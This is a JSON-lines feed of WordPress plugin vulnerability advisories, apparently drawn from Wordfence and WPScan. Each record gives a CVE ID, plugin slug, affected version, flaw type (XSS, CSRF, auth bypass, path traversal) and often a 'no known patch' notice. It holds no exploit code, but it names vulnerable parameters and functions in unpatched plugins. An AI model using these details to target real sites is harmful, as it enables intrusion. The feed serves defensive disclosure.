{"CVE_ID":"CVE-2023-6629","slug":"post-smtp","versionImpact":"2.8.6","description":"The POST SMTP Mailer \u2013 Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018msg\u2019 parameter in all versions up to, and including, 2.8.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7681f984-d488-4da7-afe1-988e5ad012f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7681f984-d488-4da7-afe1-988e5ad012f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Wizard\\\/NewWizard.php#L396\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Wizard\\\/NewWizard.php#L396\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012318%40post-smtp%2Ftrunk&old=3006604%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012318%40post-smtp%2Ftrunk&old=3006604%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1128","slug":"tutor","versionImpact":"2.6.0","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 2.6.0. This is due to insufficient sanitization of HTML input in the Q&A functionality. This makes it possible for authenticated attackers, with Student access and above, to inject arbitrary HTML onto a site, though it does not allow Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22420c2d-788c-4577-ae54-7b48f6063f5d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22420c2d-788c-4577-ae54-7b48f6063f5d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037911\\\/tutor\\\/tags\\\/2.6.1\\\/classes\\\/Q_and_A.php?old=2827221&old_path=tutor\\\/trunk\\\/classes\\\/Q_and_A.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037911\\\/tutor\\\/tags\\\/2.6.1\\\/classes\\\/Q_and_A.php?old=2827221&old_path=tutor\\\/trunk\\\/classes\\\/Q_and_A.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0847","slug":"5280-bootstrap-modal-contact-form","versionImpact":"1.0","description":"The 5280 Bootstrap Modal Contact Form plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation in class-sbmm-list-table.php. This makes it possible for unauthenticated attackers to bulk delete messages via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18464483-1d2f-4a4e-a1cc-6c1ddcc2dcf5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18464483-1d2f-4a4e-a1cc-6c1ddcc2dcf5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/5280-bootstrap-modal-contact-form\\\/trunk\\\/inc\\\/class-sbmm-list-table.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/5280-bootstrap-modal-contact-form\\\/trunk\\\/inc\\\/class-sbmm-list-table.php#L142\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5481","slug":"photo-gallery","versionImpact":"1.8.23","description":"The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.8.23 via the esc_dir function. This makes it possible for authenticated attackers to cut and paste (copy) the contents of arbitrary files on the server, which can contain sensitive information, and to cut (delete) arbitrary directories, including the root WordPress directory. By default this can be exploited by administrators only. In the premium version of the plugin, administrators can give gallery edit permissions to lower level users, which might make this exploitable by users as low as contributors.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76c38826-4d49-4204-b6b6-b01d01373fa9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76c38826-4d49-4204-b6b6-b01d01373fa9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L178\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L512\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L512\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L436\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L436\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098798\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098798\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/photo-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/photo-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5169","slug":"video-widget","versionImpact":"1.2.3","description":"The Video Widget WordPress plugin through 1.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0de62e3-5e85-43f3-8e3e-e816dafb1406\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0de62e3-5e85-43f3-8e3e-e816dafb1406\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6599","slug":"meks-video-importer","versionImpact":"1.0.11","description":"The Meks Video Importer plugin for WordPress is vulnerable to unauthorized API key modification due to a missing capability check on the ajax_save_settings function in all versions up to, and including, 1.0.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the plugin's API keys","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaf9cc48-1ba6-4e9b-9f49-54f7747c26e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaf9cc48-1ba6-4e9b-9f49-54f7747c26e0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meks-video-importer\\\/trunk\\\/includes\\\/class.meks-video-importer-vimeo.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meks-video-importer\\\/trunk\\\/includes\\\/class.meks-video-importer-vimeo.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meks-video-importer\\\/trunk\\\/includes\\\/class.meks-video-importer-youtube.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meks-video-importer\\\/trunk\\\/includes\\\/class.meks-video-importer-youtube.php#L98\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6018","slug":"music-request-manager","versionImpact":"1.3","description":"The Music Request Manager WordPress plugin through 1.3 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3f50e30-c7c5-4e7e-988c-ab884d75870b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3f50e30-c7c5-4e7e-988c-ab884d75870b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9931","slug":"wux-blog-editor","versionImpact":"3.0.0","description":"The Wux Blog Editor plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.0.0. This is due to missing validation on the token being supplied during the autologin through the plugin. This makes it possible for unauthenticated attackers to log in to the first administrator user.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494ef738-c900-4d00-8739-3b261586d4ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494ef738-c900-4d00-8739-3b261586d4ff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wux-blog-editor\\\/tags\\\/3.0.0\\\/External_Post_Editor.php#L675\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wux-blog-editor\\\/tags\\\/3.0.0\\\/External_Post_Editor.php#L675\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12447","slug":"get-post-content-shortcode","versionImpact":"0.4","description":"The Get Post Content Shortcode plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 0.4 via the 'post-content' shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the content of password-protected, private, draft, and pending posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-post-content-shortcode\\\/trunk\\\/get-post-content-shortcode.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-post-content-shortcode\\\/trunk\\\/get-post-content-shortcode.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2b92091-e615-484f-b402-2e793eed214d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2b92091-e615-484f-b402-2e793eed214d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12252","slug":"seo-beginner-auto-post","versionImpact":"2.2.1","description":"The SEO LAT Auto Post plugin for WordPress is vulnerable to file overwrite due to a missing capability check on the remote_update AJAX action in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to overwrite the seo-beginner-auto-post.php file which can be leveraged to achieve remote code execution.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-beginner-auto-post\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-beginner-auto-post\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67df10cc-ce3c-4157-9860-7e367062f710?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67df10cc-ce3c-4157-9860-7e367062f710?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13386","slug":"quote-post-type-plugin","versionImpact":"1.2.2","description":"The quote-posttype-plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Author field in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quote-post-type-plugin\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quote-post-type-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4aa09e5b-fc3d-4409-bf2c-dd8aae69eeda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4aa09e5b-fc3d-4409-bf2c-dd8aae69eeda?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3106","slug":"lastudio-element-kit","versionImpact":"1.4.9","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Table of Contents widget in all versions up to, and including, 1.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/assets\\\/js\\\/addons\\\/tablet-contents.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/assets\\\/js\\\/addons\\\/tablet-contents.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275257\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275257\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c633419-e231-437f-a2af-6f564cffc2df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c633419-e231-437f-a2af-6f564cffc2df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5142","slug":"simple-page-access-restriction","versionImpact":"1.0.31","description":"The Simple Page Access Restriction plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.31. This is due to missing nonce validation and capability checks in the settings save handler in the settings.php script. This makes it possible for unauthenticated attackers to (1) enable or disable access protection on all post types or taxonomies, (2) force every new page\/post to be public or private, regardless of meta-box settings, (3) cause a silent wipe of all plugin data when it\u2019s later removed, or (4) to conduct URL redirection attacks via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-page-access-restriction\\\/tags\\\/1.0.31\\\/includes\\\/admin\\\/settings\\\/settings.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-page-access-restriction\\\/tags\\\/1.0.31\\\/includes\\\/admin\\\/settings\\\/settings.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300680\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300680\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-page-access-restriction\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-page-access-restriction\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/657e2a4d-7e10-495d-8352-1adc0cb89e83?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/657e2a4d-7e10-495d-8352-1adc0cb89e83?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2304","slug":"favorites","versionImpact":"2.3.2","description":"The Favorites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'user_favorites' shortcode in versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bd03cd0-34f0-491c-8247-79656eba32a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bd03cd0-34f0-491c-8247-79656eba32a8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2919192%40favorites&old=2805323%40favorites&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2919192%40favorites&old=2805323%40favorites&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/favorites\\\/tags\\\/2.3.2\\\/assets\\\/js\\\/favorites.js#L421\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/favorites\\\/tags\\\/2.3.2\\\/assets\\\/js\\\/favorites.js#L421\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/favorites\\\/tags\\\/2.3.2\\\/app\\\/API\\\/Shortcodes\\\/UserFavoritesShortcode.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/favorites\\\/tags\\\/2.3.2\\\/app\\\/API\\\/Shortcodes\\\/UserFavoritesShortcode.php#L57\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47552","slug":"image-hover-effects","versionImpact":"5.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in Labib Ahmed Image Hover Effects \u2013 WordPress Plugin.This issue affects Image Hover Effects \u2013 WordPress Plugin: from n\/a through 5.5.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/image-hover-effects\\\/wordpress-image-hover-effects-plugin-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/image-hover-effects\\\/wordpress-image-hover-effects-plugin-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1091","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reinitialize function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to remove all plugin data.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb8b08c-a028-48bd-acad-c00313fe06b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb8b08c-a028-48bd-acad-c00313fe06b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2036","slug":"apply-online","versionImpact":"2.6","description":"The ApplyOnline \u2013 Application Form Builder and Manager plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the aol_modal_box AJAX action in all versions up to, and including, 2.6. This makes it possible for authenticated attackers, with subscriber access or higher, to view Application submissions.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3eff4992-dbd4-4b9b-872e-1670ce7dab9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3eff4992-dbd4-4b9b-872e-1670ce7dab9d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/apply-online\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/apply-online\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5071","slug":"bookster","versionImpact":"1.1.0","description":"The Bookster  WordPress plugin through 1.1.0 allows adding sensitive parameters when validating appointments allowing attackers to manipulate the data sent when booking an appointment (the request body) to change its status from pending to approved.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07b293cf-5174-45de-8606-a782a96a35b3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07b293cf-5174-45de-8606-a782a96a35b3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6175","slug":"booking-ultra-pro","versionImpact":"1.1.13","description":"The Booking Ultra Pro Appointments Booking Calendar Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the multiple functions in all versions up to, and including, 1.1.13. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify and delete. multiple plugin options and data such as payments, pricing, booking information, business hours, calendars, profile information, and email templates.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0594ed62-0a41-4819-89b8-ea31afbcac73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0594ed62-0a41-4819-89b8-ea31afbcac73?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking-ultra-pro\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking-ultra-pro\\\/#description\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6017","slug":"music-request-manager","versionImpact":"1.3","description":"The Music Request Manager WordPress plugin through 1.3 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06d0559e-4389-4280-bbef-d100c0e07903\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06d0559e-4389-4280-bbef-d100c0e07903\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9930","slug":"sb-core","versionImpact":"0.2.3.2","description":"The Extensions by HocWP Team plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 0.2.3.2. This is due to missing validation on the user being supplied in the 'verify_email' action. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator. The vulnerability is in the Account extension.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca3775db-0722-4090-924e-81e38d5dce97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca3775db-0722-4090-924e-81e38d5dce97?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sb-core\\\/trunk\\\/ext\\\/account.php?rev=2715527#L374\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sb-core\\\/trunk\\\/ext\\\/account.php?rev=2715527#L374\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12411","slug":"wp-ad-guru","versionImpact":"2.5.4","description":"The WP Ad Guru \u2013 Banner ad, Responsive popup, Popup maker, Ad rotator & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ad-guru\\\/trunk\\\/includes\\\/admin\\\/zone-manager\\\/zone-manager-page.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ad-guru\\\/trunk\\\/includes\\\/admin\\\/zone-manager\\\/zone-manager-page.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa9edf84-7ba0-488c-93ca-ed0b2ee435d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa9edf84-7ba0-488c-93ca-ed0b2ee435d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12214","slug":"woocommerce-hss-extension-for-streaming-video","versionImpact":"3.31","description":"The WooCommerce HSS Extension for Streaming Video plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018videolink\u2019 parameter in all versions up to, and including, 3.31 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-hss-extension-for-streaming-video\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-hss-extension-for-streaming-video\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d633f71-3b2b-4fe3-80f1-4c2dcc86313c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d633f71-3b2b-4fe3-80f1-4c2dcc86313c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13367","slug":"sandbox","versionImpact":"0.4","description":"The Sandbox plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the export_download action in all versions up to, and including, 0.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to download an entire copy of a sandbox environment which can contain sensitive information like the wp-config.php file.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 